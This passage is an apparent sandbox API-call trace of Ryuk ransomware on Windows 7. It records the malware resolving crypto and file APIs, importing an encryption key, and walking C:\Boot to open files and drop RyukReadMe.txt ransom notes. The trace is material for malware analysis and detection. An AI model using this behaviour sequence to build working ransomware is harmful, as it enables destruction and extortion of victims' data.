returned 0x77568070 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="FindNextFileW") returned 0x77561910 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="VirtualAlloc") returned 0x775667a0 [0125.077] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameA") returned 0x7feff74dc20 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="ExitProcess") returned 0x776940f0 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7759bb30 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessA") returned 0x775e8840 [0125.077] GetProcAddress (hModule=0x7fefaf60000, lpProcName="GetIpNetTable") returned 0x7fefaf6e558 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="GetVersionExW") returned 0x7755d910 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7759bb40 [0125.077] GetProcAddress (hModule=0x77550000, lpProcName="GetSystemDefaultLangID") returned 0x775594e0 [0125.077] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameW") returned 0x7feff751fd0 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="ReadFile") returned 0x77561500 [0125.078] GetProcAddress (hModule=0x7feff740000, lpProcName="RegQueryValueExA") returned 0x7feff75c480 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="CloseHandle") returned 0x77572f80 [0125.078] GetProcAddress (hModule=0x7feff740000, lpProcName="RegSetValueExW") returned 0x7feff751ed0 [0125.078] GetProcAddress (hModule=0x7feff740000, lpProcName="RegCloseKey") returned 0x7feff760710 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileA") returned 0x775e5620 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesW") returned 0x775637a0 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="WinExec") returned 0x775e8d80 [0125.078] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDeriveKey") returned 0x7feff77b6b0 [0125.078] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptGenKey") returned 0x7feff7419bc [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="Sleep") returned 0x77572b70 [0125.078] GetProcAddress (hModule=0x77550000, lpProcName="GetCurrentProcess") returned 0x77565cf0 [0125.078] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteW") returned 0x7fefe37983c [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSize") returned 0x7755f9d0 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GlobalAlloc") returned 0x775580c0 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="FindClose") returned 0x7756bd60 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="WaitForMultipleObjects") returned 0x77561170 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameA") returned 0x775664a0 [0125.079] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteA") returned 0x7fefe5bec80 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleHandleA") returned 0x775665e0 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameW") returned 0x77567700 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileA") returned 0x775731f0 [0125.079] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSizeEx") returned 0x77559b30 [0125.080] GetProcAddress (hModule=0x77550000, lpProcName="WriteFile") returned 0x775735a0 [0125.080] GetProcAddress (hModule=0x77550000, lpProcName="GetLogicalDrives") returned 0x7755b930 [0125.080] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetEnumResourceW") returned 0x7fefaaa41a0 [0125.080] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExW") returned 0x7feff7606f0 [0125.080] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetCloseEnum") returned 0x7fefaaa42dc [0125.080] GetProcAddress (hModule=0x77550000, lpProcName="GetWindowsDirectoryW") returned 0x775582b0 [0125.080] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesA") returned 0x77552d50 [0125.080] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExA") returned 0x7feff75b5f0 [0125.080] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointer") returned 0x77561150 [0125.081] GetProcAddress (hModule=0x77550000, lpProcName="GetTickCount") returned 0x77572b00 [0125.081] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesW") returned 0x7756bdd0 [0125.081] GetProcAddress (hModule=0x77550000, lpProcName="FindFirstFileW") returned 0x7756bd80 [0125.081] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptAcquireContextW") returned 0x7feff74d98c [0125.081] GetProcAddress (hModule=0x77550000, lpProcName="MoveFileExW") returned 0x77553060 [0125.081] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetOpenEnumW") returned 0x7fefaaa3e00 [0125.081] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoInitialize") returned 0x7fefde0a51c [0125.081] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDecrypt") returned 0x7feff77b6d0 [0125.081] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptImportKey") returned 0x7feff74af6c [0125.081] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointerEx") returned 0x7755af00 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileW") returned 0x775592d0 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="FreeLibrary") returned 0x77566620 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessW") returned 0x77571bb0 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="CreateDirectoryW") returned 0x7755ad70 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="CreateThread") returned 0x77566580 [0125.082] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDestroyKey") returned 0x7feff74afa0 [0125.082] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoCreateInstance") returned 0x7fefde17490 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileW") returned 0x77561870 [0125.082] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesA") returned 0x775613e0 [0125.082] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptEncrypt") returned 0x7feff77b650 [0125.082] GetProcAddress (hModule=0x7feff740000, lpProcName="RegDeleteValueW") returned 0x7feff74bbb0 [0125.082] GetVersionExW (in: lpVersionInformation=0x29af860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29af860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0125.082] GetWindowsDirectoryW (in: lpBuffer=0x29af910, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0125.082] SetLastError (dwErrCode=0x0) [0125.083] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0125.083] GetLastError () returned 0x2 [0125.083] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0x124 [0125.083] Sleep (dwMilliseconds=0x1388) [0130.399] GetVersionExW (in: lpVersionInformation=0x29aef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29aef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.399] GetWindowsDirectoryW (in: lpBuffer=0x13f10adb0, uSize=0x64 | out: lpBuffer="C:\\Windows") returned 0xa [0130.399] GetWindowsDirectoryW (in: lpBuffer=0x13f10be40, uSize=0x140 | out: lpBuffer="C:\\Windows") returned 0xa [0130.399] CreateFileW (lpFileName="C:\\users\\Public\\PUBLIC" (normalized: "c:\\users\\public\\public"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0130.400] WriteFile (in: hFile=0x128, lpBuffer=0x13f1083d0*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x29aebc0, lpOverlapped=0x0 | out: lpBuffer=0x13f1083d0*, lpNumberOfBytesWritten=0x29aebc0*=0x114, lpOverlapped=0x0) returned 1 [0130.400] CloseHandle (hObject=0x128) returned 1 [0130.402] CreateFileW (lpFileName="C:\\users\\Public\\UNIQUE_ID_DO_NOT_REMOVE" (normalized: "c:\\users\\public\\unique_id_do_not_remove"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0130.402] WriteFile (in: hFile=0x128, lpBuffer=0x13f107e20*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x29aebc0, lpOverlapped=0x0 | out: lpBuffer=0x13f107e20*, lpNumberOfBytesWritten=0x29aebc0*=0x5a4, lpOverlapped=0x0) returned 1 [0130.403] CloseHandle (hObject=0x128) returned 1 [0130.404] CreateFileW (lpFileName="C:\\users\\Public\\PUBLIC" (normalized: "c:\\users\\public\\public"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0130.404] CloseHandle (hObject=0x128) returned 1 [0130.404] CryptAcquireContextW (in: phProv=0x13f10be10, szContainer="AES_unique_", szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x10 | out: phProv=0x13f10be10*=0x0) returned 0 [0130.433] CryptAcquireContextW (in: phProv=0x13f10be10, szContainer="AES_unique_", szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x20 | out: phProv=0x13f10be10*=0x0) returned 0 [0130.440] CryptAcquireContextW (in: phProv=0x13f10be10, szContainer="AES_unique_", szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x28 | out: phProv=0x13f10be10*=0x3add40) returned 1 [0130.447] CreateFileW (lpFileName="C:\\users\\Public\\PUBLIC" (normalized: "c:\\users\\public\\public"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0130.447] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x114 [0130.447] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0130.447] ReadFile (in: hFile=0x128, lpBuffer=0x340000, nNumberOfBytesToRead=0x114, lpNumberOfBytesRead=0x29af0b0, lpOverlapped=0x0 | out: lpBuffer=0x340000*, lpNumberOfBytesRead=0x29af0b0*=0x114, lpOverlapped=0x0) returned 1 [0130.447] CryptImportKey (in: hProv=0x3add40, pbData=0x340000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x1, phKey=0x13f10e838 | out: phKey=0x13f10e838*=0x3b8620) returned 1 [0130.447] Sleep (dwMilliseconds=0x3e8) [0131.461] GetLogicalDrives () returned 0x4 [0131.461] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0131.461] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 0x3bcd90 [0131.462] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.462] SetLastError (dwErrCode=0x0) [0131.462] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.462] GetLastError () returned 0x5 [0131.462] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.463] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3c7120 [0131.463] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.463] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.463] SetFileAttributesW (lpFileName="C:\\Boot\\BCD", dwFileAttributes=0x80) returned 0 [0131.463] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.463] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.464] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 0 [0131.464] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.464] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.464] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG1", dwFileAttributes=0x80) returned 0 [0131.464] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.465] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.465] SetFileAttributesW (lpFileName="C:\\Boot\\BCD.LOG2", dwFileAttributes=0x80) returned 0 [0131.465] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.465] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.465] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.465] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 0 [0131.467] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.467] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.467] SetLastError (dwErrCode=0x0) [0131.467] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.467] GetLastError () returned 0x5 [0131.467] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.467] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.468] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.468] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.468] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.468] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.468] SetLastError (dwErrCode=0x0) [0131.468] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\RyukReadMe.txt" (normalized: "c:\\boot\\cs-cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.468] GetLastError () returned 0x5 [0131.468] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.468] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.468] SetLastError (dwErrCode=0x0) [0131.468] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.468] GetLastError () returned 0x5 [0131.468] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.469] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.469] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.469] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.469] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.469] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.469] SetLastError (dwErrCode=0x0) [0131.469] CreateFileW (lpFileName="C:\\Boot\\da-DK\\RyukReadMe.txt" (normalized: "c:\\boot\\da-dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.469] GetLastError () returned 0x5 [0131.469] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.469] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.469] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.469] SetLastError (dwErrCode=0x0) [0131.469] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.469] GetLastError () returned 0x5 [0131.469] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.469] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.469] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.470] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.470] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.470] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.470] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.471] SetLastError (dwErrCode=0x0) [0131.471] CreateFileW (lpFileName="C:\\Boot\\de-DE\\RyukReadMe.txt" (normalized: "c:\\boot\\de-de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.471] GetLastError () returned 0x5 [0131.471] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.471] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.471] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.471] SetLastError (dwErrCode=0x0) [0131.471] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.471] GetLastError () returned 0x5 [0131.471] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.471] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.471] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.471] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.471] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.472] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.472] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.472] SetLastError (dwErrCode=0x0) [0131.472] CreateFileW (lpFileName="C:\\Boot\\el-GR\\RyukReadMe.txt" (normalized: "c:\\boot\\el-gr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.472] GetLastError () returned 0x5 [0131.472] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.472] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.472] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.472] SetLastError (dwErrCode=0x0) [0131.472] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.472] GetLastError () returned 0x5 [0131.472] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.472] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.472] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.473] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.473] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.473] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.473] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.473] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.473] SetLastError (dwErrCode=0x0) [0131.473] CreateFileW (lpFileName="C:\\Boot\\en-US\\RyukReadMe.txt" (normalized: "c:\\boot\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.473] GetLastError () returned 0x5 [0131.474] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.474] FindNextFileW (in: hFindFile=0x3c7120, 